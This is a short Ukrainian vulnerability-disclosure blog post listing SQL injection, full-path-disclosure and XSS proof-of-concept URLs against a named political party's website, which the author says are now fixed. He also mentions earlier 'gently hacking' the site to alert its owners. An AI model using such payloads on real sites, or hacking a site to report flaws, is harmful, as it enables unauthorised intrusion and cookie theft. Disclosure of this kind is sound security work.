Уразливості на www.usdp.kiev.ua
19:15 03.04.201006.10.2009
У лютому, 07.02.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на http://www.usdp.kiev.ua - сайті політичної партії УСДП. Про що найближчим часом сповіщу адміністрацію сайта.
Зазначу, що я вже повідомляв власникам сайта про проблеми з його безпекою (шляхом ніжного хака сайта). Але вони й досі не виправили жодної уразливості на сайті, тим самим продовживши ігнорувати проблему безпеки власного ресурсу.
Детальна інформація про уразливості з’явиться пізніше.
03.04.2010
SQL Injection:
http://www.usdp.kiev.ua/?mid=-1%20or%20version()=5
http://www.usdp.kiev.ua/?mid=157&action=events_detail&id=-1%20or%20version()=5
Full path disclosure:
http://www.usdp.kiev.ua/?mid=-1
XSS:
http://www.usdp.kiev.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Дані уразливості вже виправлені. Але всіх проблем з безпекою сайта це не вирішило, бо на сайті все ще є дірки.